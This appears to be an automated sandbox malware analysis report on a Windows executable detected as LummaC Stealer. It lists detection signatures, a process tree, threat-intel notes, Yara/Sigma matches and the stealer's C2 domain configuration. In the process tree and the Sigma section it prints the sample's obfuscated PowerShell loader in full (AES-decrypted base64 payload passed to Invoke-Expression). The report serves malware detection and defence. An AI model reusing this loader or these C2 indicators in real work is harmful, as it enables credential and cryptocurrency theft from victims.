Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519693
MD5:	a2b2889063a7a3f9785253f937ee6fe4
SHA1:	f3499e38acaf1837c7b3d7289dd6627f5f7b3e3f
SHA256:	e2a2430866d3186a75e84da8443e4b306aaa91527e4e8856c1a7f7e217aade81
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

Contains functionality to prevent local Windows debugging

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Suspicious execution chain found

Suspicious powershell command line found

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6944 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A2B2889063A7A3F9785253F937EE6FE4)

powershell.exe (PID: 7036 cmdline: "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs = [Convert]::FromBase64String($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT) $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb = [System.Security.Cryptography.Aes]::Create() $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Key = $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.IV = $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $9gY4UkUZwjENCIyWO4JCxsmga3P0xlPU6vUfSnqoMK1oq5nZlA0nCvdhuhur5t1K4jhGnTD0eWqn0ypEfpfwU1SaRdkbtySSiQTHogb2xzJgFpQvrpMfO4qC1GpJ817fC7FJeiQyNMzUSb41XpjEmdDN0Rfhr2u523d7kGQI9N1C55jqbXmii2tZ3sjXD8GlS4spxxhQ = $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.CreateDecryptor($5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Key, $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.IV) $8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK = New-Object System.IO.MemoryStream(, $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs) $nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0 = New-Object System.Security.Cryptography.CryptoStream($8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK, $9gY4UkUZwjENCIyWO4JCxsmga3P0xlPU6vUfSnqoMK1oq5nZlA0nCvdhuhur5t1K4jhGnTD0eWqn0ypEfpfwU1SaRdkbtySSiQTHogb2xzJgFpQvrpMfO4qC1GpJ817fC7FJeiQyNMzUSb41XpjEmdDN0Rfhr2u523d7kGQI9N1C55jqbXmii2tZ3sjXD8GlS4spxxhQ, [System.Security.Cryptography.CryptoStreamMode]::Read) $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu = New-Object System.IO.StreamReader($nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0) $YGsrBmYlw5crd5ED1HUno1Ps470gGmVJzpe9auA0k9VSzfjJdPu2W0GwrAX3WheKI2sor437HuDOFwsooQDrsuo9iih966ECvMJ6muSImVU1XrqvI8fFenSOeTGJmtAapATtmWCtyuE59XLqrm1yqzXIuvs3oJVsWkcV8xIm6mGkimeRHPSA1CkpdLzq38Ep8LJplpSt = $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu.ReadToEnd() $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu.Close() $nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0.Close() $8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK.Close() return $YGsrBmYlw5crd5ED1HUno1Ps470gGmVJzpe9auA0k9VSzfjJdPu2W0GwrAX3WheKI2sor437HuDOFwsooQDrsuo9iih966ECvMJ6muSImVU1XrqvI8fFenSOeTGJmtAapATtmWCtyuE59XLqrm1yqzXIuvs3oJVsWkcV8xIm6mGkimeRHPSA1CkpdLzq38Ep8LJplpSt } $df2DsdZHRbW8qV1TAmjXySSxhRL6cp5SxYVmagwzlr9rN6yMkqpyFuvWV4Vb1s51FDb2zfjTpkbHi0kLTzmmz7MC3BZFTW7sWHmJv5MFG5IWTndvkKR2Gi18r8zyPez4MjlaeaQnmhg4YqjfY3UJDEmcgOSV6Op25eJaBCRKu4gZCxJAoTamTq0HwIu0StQ8rOzjhJeW = 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p -MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb -keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt -q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 Invoke-Expression $df2DsdZHRbW8qV1TAmjXySSxhRL6cp5SxYVmagwzlr9rN6yMkqpyFuvWV4Vb1s51FDb2zfjTpkbHi0kLTzmmz7MC3BZFTW7sWHmJv5MFG5IWTndvkKR2Gi18r8zyPez4MjlaeaQnmhg4YqjfY3UJDEmcgOSV6Op25eJaBCRKu4gZCxJAoTamTq0HwIu0StQ8rOzjhJeW MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

csc.exe (PID: 3720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 5720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 3328 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["ptramidermsnqj.shop", "reinforcenh.shop", "gutterydhowi.shop", "stogeneratmns.shop", "vozmeatillu.shop", "offensivedzvju.shop", "fragnantbui.shop", "ghostreedmnu.shop", "drawzhotdog.shop"], "Build id": "LPnhqo--zdexodnebqjx"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 7036	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7036	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x10ae:$b2: ::FromBase64String( 0x125f:$b2: ::FromBase64String( 0x1410:$b2: ::FromBase64String( 0xb5b1:$b2: ::FromBase64String( 0xb766:$b2: ::FromBase64String( 0xb91b:$b2: ::FromBase64String( 0x7da46:$b2: ::FromBase64String( 0x7dc1b:$b2: ::FromBase64String( 0x7ddf0:$b2: ::FromBase64String( 0x94549:$b2: ::FromBase64String( 0x946fa:$b2: ::FromBase64String( 0x948ab:$b2: ::FromBase64String( 0x96711:$b2: ::FromBase64String( 0x968c6:$b2: ::FromBase64String( 0x96a7b:$b2: ::FromBase64String( 0x9fcf7:$b2: ::FromBase64String( 0x9fea8:$b2: ::FromBase64String( 0xa0059:$b2: ::FromBase64String( 0xa1db4:$b2: ::FromBase64String( 0xa1f66:$b2: ::FromBase64String( 0xa2118:$b2: ::FromBase64String(
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = 